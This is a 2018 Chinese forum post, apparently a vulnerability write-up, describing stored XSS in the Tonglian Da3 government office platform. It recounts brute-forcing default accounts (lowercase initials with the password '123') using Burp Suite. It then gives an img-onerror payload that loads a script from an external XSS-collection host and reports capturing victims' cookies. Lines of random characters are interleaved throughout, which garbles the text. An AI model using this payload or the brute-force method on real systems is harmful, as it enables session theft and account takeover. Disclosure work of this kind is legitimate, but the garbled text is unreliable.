3 {# w& l4 b( w$ s
& v. W; W8 c; }' H 同联Da3协同办公平台后台通用储存型xss漏洞
+ J) ]( @! M: e+ z$ r* {0 Z2 i
/ @; c; ^& \5 j7 C8 @, o$ W
4 }) B& \+ T6 l: g# C- [
平台简介:
7 x7 @0 E7 D! b; r
& a# g. r& X0 Z" P/ j8 C
/ |' Y9 ?# {) t" h- r* } 9 ?) [) d3 c( {0 H6 c$ Q
1 m, I2 m/ S4 P* \% x( e* g
; G8 ~, o! ]% |5 W( w 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
' n9 E4 a: i3 T0 }9 n
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
2 Q2 H6 t6 Q7 t: k; k6 q8 X) Q( |同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! X" M+ v! o6 h3 M) b6 l" o
8 }9 i: E N, `, G2 ?9 e* |. X
) B! }% e* q \, |0 p; n, D6 S- i
* z# z6 |! F3 L5 s
# |1 _9 W! c3 } ?5 v \
( M# X2 |& {% v+ D5 b6 Y; E* P
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
0 o! C! L0 D2 @
5 d" M/ h8 `3 `8 g! V* ~4 F 8 W6 M% t j# R
" i* ], m6 v" K3 e
) f: j, O5 {$ ^: k5 z 9 ?/ d3 ?( _ i1 \. a# S( L& w6 F
http://1.1.1.1:7197/cap-aco/#(案例2-)
: f. i D) S1 k
, K" d9 {2 x$ f7 Y4 e
0 D6 B+ e4 c- t# b+ b q& j http://www.XXOO.com (案例1-官网网站)
' e" W5 U8 W$ Q! m' L) E
8 W' [- d+ h _7 h8 H: Q
9 p# W+ P- m+ n- {+ A4 @) C
漏洞详情:6 S6 P+ a8 L% ?5 L- q
' C3 _5 ]0 T. B# ?8 W/ w
+ P& m/ H/ a, C$ I 案例一、. R8 _/ J4 R/ w) _; b
% h0 @8 ?. H0 E9 s* r& p+ Z' g
. U% }! C+ x7 ^: p1 D: x% k' w 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试* m% o$ B5 ?' R2 `+ a! W- M
) c& p3 F* C3 I
) i1 j/ g) |' i, _! e 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
& X) M/ W# y0 A; s5 a
8 s& n1 J5 w( i; O0 W9 ^
3 \: O3 k+ E2 Q; m/ ]9 M
1 g3 T0 K0 `0 o+ U/ \/ c+ b
+ O0 i9 P- i9 {& \7 T/ J7 P
' C/ t4 e/ Y, _& Y' `6 Q& R! [ 
; l% d) R" p- S4 X/ i
6 B0 b0 U, d2 r
& m9 j7 o2 q5 u" X: H status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
, @* @- z3 b1 P! r, ?$ T
2 j9 F6 k6 K' f: t3 n1 Z5 G 7 Q2 n9 j1 m+ U7 W, ?# U1 r
( T2 s7 r3 [, `# @! a( E1 z$ \; J" ^
! D4 J/ b# A3 d; Q
) q1 F8 N0 h2 d8 Y5 N6 ~
: P4 I. `% n2 F1 t0 M
( N" Y% M7 {2 } q2 U
' v( `7 t* U; j, H: k
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 : v: z$ h: l$ j% T$ S b
6 y" t9 A0 p- L0 o
" I3 _# L; e) k& ?% u& c% e
* s* ~# t$ _9 H5 E2 h
/ H! T% N" t3 s) x
* T3 k1 k1 w+ f, K5 G& F' J+ [* M <img src=x0 K8 m& n4 v1 c% z' K% c
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
5 H2 g& y8 q- W8 B' u
9 v. t) D4 ?1 P2 R! l) _ / I7 S4 ?# h( J: V
4 x, |9 B/ |; S3 F# {( b: d
: g$ `, E C) O. e* G, L
, o) K$ Q# ~7 a8 u3 g: B4 \ 然后发送,接收cookie如图: ! X2 l! r9 B0 r
8 j+ @8 F( k5 s( X4 K, C) _4 G
+ P' K/ G4 g! a* B. [6 C8 u $ @9 G% z2 v8 r3 k; a# Y8 Q
0 h5 \+ O% V3 K; G/ ^5 e$ _ 4 B! B9 C) y- z$ v9 B
. d8 G& e4 [+ `3 E$ S. x2 H3 Q
! c6 _+ X; U6 e; p1 T1 |1 G+ W
5 L2 N# Q4 N3 d8 d8 g
. A7 M8 E- S$ l2 F
0 x2 |: U* i6 X# \0 Q8 f( n : M1 z2 o, T _! M6 a- a
& h r1 k- M7 \' R, J
7 W1 ^4 l% X0 H' }& K
9 y) Z9 @) _3 f* z: p% p 
1 i# E$ N0 }8 b* N3 C
) e& m1 B# s4 t1 P1 [2 M
9 p6 z/ E; k" Q/ M; @ 
8 E1 o2 f4 b+ Q9 W5 C4 p# e
1 p5 T; Z- u; @2 I + G d- e8 r4 m0 u
. j$ p# b4 z+ \( `4 P
) ?- X3 u$ h8 j! F" h 9 u4 i( g5 N4 l: B+ x# H0 O) o6 j
案例2、 : ~/ T0 |) }, e/ E" `
7 L; O4 a) n$ j! U
" @& r6 r6 R( N) L8 ~ 前面步骤都一样,下面看效果图: ! b) j" c! w( S2 H, D9 S, z
9 j! o F. p; ?. h7 q8 |& m
8 Q2 w$ D1 \& l9 S# v. K1 N: S 
# h& ?# t9 ]7 k
R8 o6 c B4 W9 D4 p ' H; }/ Q. ~9 f! \4 e% ]7 E
# |# ]4 g5 g0 ?; L. L; w2 \7 q
: Z1 A! \/ Q3 j1 s a( y
4 ] m' U% i! p ? % t: B( u. ?( }# h! c
, u" P, B {5 F8 K- R0 G5 W: L! s" C
" a. K% J' I" c4 z
9 s1 ~! r# |0 ~; i) ?9 h
( o7 k/ b1 x- ^& {8 w; x . x. O5 g) V+ x9 y9 M, s5 F
! }2 H& E/ @! M ^5 S; R
1 j+ A, D J4 X7 `. A2 U' V0 ^
& v c5 z; U/ U: \) V1 i 4 @7 w% Q- W: A
2 z: e2 W; L- z5 H) G 0 I1 D) n7 ]) U! v0 ]7 E
' X2 J4 F H3 ?' ^+ R$ n
9 T+ p Y2 ^2 |1 O- G
& O& G8 T3 s0 Q0 p9 U# E& @2 q7 Z- ~
: R. j' K7 W2 U% G# D
% D9 [- Y4 v( m( {- \
' v N u; v$ v: q+ P4 ?1 j " Z( M2 q- z* y; H0 Z$ N. c
5 A3 Q' R3 O: a$ o* c2 J
发表于 2018-10-20 20:14:15
收藏
支持
反对